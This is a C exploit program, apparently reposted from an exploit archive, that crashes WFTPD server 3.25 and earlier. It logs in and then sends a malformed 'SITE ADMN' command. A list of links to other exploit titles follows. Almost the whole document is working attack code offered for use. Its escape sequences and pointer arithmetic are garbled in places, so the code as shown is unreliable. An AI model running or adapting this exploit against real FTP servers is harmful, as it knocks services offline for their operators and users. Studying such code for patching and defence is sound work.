/************************************************************************

*WFTPD server <= 3.25 SITE ADMN DoS *

* *

*Sending command SITE ADMN 32 makes server BOOM *

* *

*usage: wftpd_dos.exe ip port user pass *

* *

*Coded by Marsu <Marsupilamipowa@hotmail.fr> *

************************************************************************/ #include "winsock2.h"

#include "stdio.h"

#include "stdlib.h"

#pragma comment(lib, "ws2_32.lib") int main(int argc, char* argv[])

{

struct hostent *he;

struct sockaddr_in sock_addr;

WSADATA wsa;

int ftpsock;

char recvbuff[1024];

char evilbuff[100];

int buflen=100; if (argc!=5)

{

printf("[ ] Usage: %s <ip> <port> <user> <pass>n",argv[0]);

return 1;

}

WSACleanup();

WSAStartup(MAKEWORD(2,0),&wsa); printf("[ ] Connecting to %s:%s ... ",argv[1],argv[2]);

if ((he=gethostbyname(argv[1])) == NULL) {

printf("Failedn[-] Could not init gethostbynamen");

return 1;

}

if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {

printf("Failedn[-] Socket errorn");

return 1;

} sock_addr.sin_family = PF_INET;

sock_addr.sin_port = htons(atoi(argv[2]));

sock_addr.sin_addr = *((struct in_addr *)he->h_addr);

memset(&(sock_addr.sin_zero), '', 8);

if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {

printf("Failedn[-] Sorry, cannot connect to %s:%s. Error: %in", argv[1],argv[2],WSAGetLastError());

return 1;

}

printf("OKn");

memset(recvbuff,'',1024);

recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'',buflen);

memcpy(evilbuff,"USER ",5);

memcpy(evilbuff 5,argv[3],strlen(argv[3]));

memcpy(evilbuff 5 strlen(argv[3]),"rn",3);

printf("[ ] Sending USER ... ");

if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {

printf("Failedn[-] Could not sendn");

return 1;

}

printf("OKn");

memset(recvbuff,'',1024);

recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'',buflen);

memcpy(evilbuff,"PASS ",5);

memcpy(evilbuff 5,argv[4],strlen(argv[4]));

memcpy(evilbuff 5 strlen(argv[4]),"rn",3); printf("[ ] Sending PASS ... ");

if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {

printf("Failedn[-] Could not sendn");

return 1;

}

printf("OKn");

recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'',buflen);

memcpy(evilbuff,"SITE ADMN ",10);

memset(evilbuff 10,32,1); //this char is powerfull :p

memcpy(evilbuff 10 1,"rn",3); printf("[ ] Sending SITE ADMN ... ");

if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {

printf("Failedn[-] Could not sendn");

return 1;

}

printf("OKn"); printf("[ ] Host should be downn");

return 0;

}

//http://www.leftworld.net

【WFTPD Pro Server】相关文章：

★ Maian Greetings 2.1 Insecure Cookie Handling Vulnerability

★ Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

★ Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day

★ Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

★ DESlock

★ WarFTP 1.65 (USER) Remote Buffer Overlow Exploit

★ Ultra Office ActiveX Control Remote Buffer Overflow Exploit

★ Maian Cart 1.1 Insecure Cookie Handling Vulnerability

★ HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit

★ PPMate PPMedia Class ActiveX Control Buffer Overflow PoC